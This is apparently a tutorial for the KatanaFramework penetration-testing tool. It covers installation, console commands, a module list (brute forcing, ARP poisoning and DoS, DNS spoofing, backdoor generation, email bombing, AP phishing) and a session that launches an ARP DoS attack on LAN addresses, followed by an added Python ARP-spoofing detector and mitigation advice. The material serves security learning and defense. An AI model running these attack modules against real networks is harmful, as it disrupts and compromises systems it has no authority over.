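Penetration testing tool (KatanaFramework)

Introduction

Katana is a penetration testing framework written in Python, built on a simple yet comprehensive architecture that anyone can use, modify and share.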

Download and installation

git clone https://github.com/PowerScript/KatanaFramework.git
cd KatanaFramework/
Install the dependencies:
chmod +x dependencies
./dependencies
Install:
python install

Usage

ktf.console

[email protected]:~/KatanaFramework# ktf.console 

[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@@[email protected]@@@Mm
||========mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm===========||
|| @MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm ||
|| [email protected] ||
|| @@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ||
|| @[email protected] ||
|| @@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ||
|| @[email protected] ||
||[email protected]=========||
|| /TT\mMMMMMMMMMMFRAMEWORKMMMMMMMMMMMMm ||
|| (____)@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@Mm ||
|| |# P | ||
|| |# W | Core [ 1.0.0.1, Build: 0069 ] ||
|| |#_N_| Date [ 25/12/16:14/03/17 ] ||
|| |_ _| Banner [ SPACE ] ||
|| /|__|\ Modules [ 37 ] Tools [ 2 ] ||
|| /__\/__\ The Hacking Framework ||
() ()

[ktf]:

  • Some commonly used commands

Command            Quick Command  Description
show modules       showm          Show modules
show options       sop            Show options module
show full options  sfop           Show full options module
use                use            Use module
getinfo            getinfo        Show information of module
set                set            Change valor of a parameter
back               back           Backing or return
run                run            run Module
update             u              Update framework
exit               x              Exit of framework
invoke                            Open a module in one new console
help               h              Show help
session                           Session command
clear              c              Clear screen
s::                s::            Save Variable
x::                x::            Execute System Commands
f::                f::            Execute Functions

It is really much the same as using Metasploit.

As for the last entry, f::, it runs built-in functions.
Here is the list of built-in functions:

Name                 Parameters          Description
get_aps()            Interface, timeout  Scan Access point’s
get_interfaces()     None                Get Network Interfaces
get_monitors_mode()  None                Get Monitor Interfaces Wireless
start_monitor()      Interface           Start Monitor Mode in Interface
get_local_ip()       None                Get local IP
get_external_ip()    None                Get External IP
get_gateway()        None                Get Gateway/Router IP

For example, to display the current machine's IP, just enter:

[ktf]:f::get_local_ip()
172.17.0.2

The others work the same way.
You can also enter
x::ifconfig
which runs a system command to get the IP.

For more usage details, see the wiki:
https://github.com/PowerScript/KatanaFramework/wiki/How-to-use

Hands-on

 [ktf]:show modules

CodeName Description
web/cp.finder Administrator Panel Finder.
web/sub.dns Subdomain Bruteforce.
web/bypass.sql bypass SQLi with Cheats Injections.
web/bt.form Brute force to Form-based.
web/bt.http Brute force to Http Authentication.
web/whois Whois, DNS Lookup.
web/clt.lfd LFD Vulnerability Console.
net/sf.arp ARP tables Monitor.
net/sc.hosts Hosts live Scan in LAN.
net/sc.scan Scan [Ports, OS, Etc] IP.
net/work.sniff HTTP sniffer.
net/arp.pson ARP poisoning Attack.
net/arp.dos ARP D.O.S Attack.
net/dns.spoof DNS Spoofing.
net/dns.fake DNS fake Server Spoof.
net/web.dos Web D.O.S Attack in LAN.
msf/back.door Generate backdoors with MSF.
set/web.hot Gathering Information with web.
set/em.boom E-mail Boombing (SPAM).
clt/cl.sql Mysql Console Client.
clt/cl.ftp FTP Console Client.
clt/cl.pop POP Console Client.
clt/cl.adb ADB Console Client (Android).
btf/pr.ftp Brute Force to FTprotocol.
btf/pr.sql Brute Force to SQL protocol.
btf/pr.ssh Brute Force to SSH protocol.
btf/pr.pop Brute Force to POP3 protocol.
anf/af.imagen Forensic image analysis.
fle/bt.rar Brute Force to RAR file.
fle/scan.file Report of Virus Scan file.
fle/bt.zip Brute Force to ZIP file.
mcs/gn.words Generator Dictionaries.
mcs/i.settup Show Properties of System Current.
mcs/ts.login Test Credentials protocols.
mcs/px.checker Proxy list checker.
wifi/ap.dos Access Point D.O.S attack.
wifi/ev.twin Access Point Phising.

[ktf]:use ney/arp.dos
[ktf]:use net/arp.dos
+[ktf](net/arp.dos):show options

[options] [RQ] [description] [value]
--------- ---- ------------- -------
interface yes Interface eth0
target yes Target IP 192.168.1.223
gateway yes Gateway IP 192.168.1.254

+[ktf](net/arp.dos):x::ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 0.0.0.0
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 51570 bytes 76514794 (72.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34792 bytes 2667790 (2.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

+[ktf](net/arp.dos):set target 192.168.1.100
↳--------> target = 192.168.1.100
+[ktf](net/arp.dos):set gateway 192.168.1.1
↳--------> gateway = 192.168.1.1
+[ktf](net/arp.dos):run
[run] The module was launched...
[inf] Tue Jun 27 09:06:34 2017
[inf] Starting ARP D.O.S attack...
| [press-key] if you want to stop ARP D.O.S Attack (PRESS [ENTER])
|
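
The session above launches net/arp.dos with a target and a gateway set. The following Python is an added example (not part of the original post or of KatanaFramework) showing how a defender could flag this kind of activity in captured ARP replies. It assumes the attack shows up as forged replies that rebind the gateway IP to a different MAC; the capture lines, MAC addresses, baseline and the detect() helper are all constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed capture lines in `tcpdump -n arp` style (not from the original post).
SAMPLE = """\
09:06:30.100000 ARP, Request who-has 192.168.1.1 tell 192.168.1.100, length 28
09:06:30.101000 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28
09:06:34.200000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
09:06:34.700000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
09:06:35.200000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
09:06:35.300000 ARP, Reply 192.168.1.100 is-at aa:bb:cc:00:00:64, length 28
"""

REPLY = re.compile(r"^(\d+):(\d+):(\d+\.\d+) ARP, Reply (\S+) is-at ([0-9a-f:]{17})")

def detect(lines, baseline, window=2.0, burst=3):
    """Return alerts for replies that contradict the trusted IP->MAC baseline,
    and for bursts of replies claiming the same IP inside `window` seconds."""
    alerts, recent = [], defaultdict(list)
    for line in lines:
        m = REPLY.match(line)
        if not m:
            continue  # requests and non-ARP lines carry no binding claim
        h, mi, s, ip, mac = m.groups()
        ts = int(h) * 3600 + int(mi) * 60 + float(s)
        # A protected IP announced with an unexpected MAC is the key signal.
        if ip in baseline and mac != baseline[ip]:
            alerts.append(("mac-mismatch", ip, mac))
        # Keep only timestamps inside the sliding window, then add this one.
        recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
        if len(recent[ip]) == burst:  # fires once per burst
            alerts.append(("reply-burst", ip, mac))
    return alerts

# Assumed known-good bindings, e.g. recorded while the network was trusted.
BASELINE = {"192.168.1.1": "aa:bb:cc:00:00:01"}

if __name__ == "__main__":
    for alert in detect(SAMPLE.splitlines(), BASELINE):
        print(alert)
```

Pinning the gateway's MAC with a static ARP entry on important hosts, or enabling dynamic ARP inspection on managed switches, prevents the rebinding that this check only detects.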
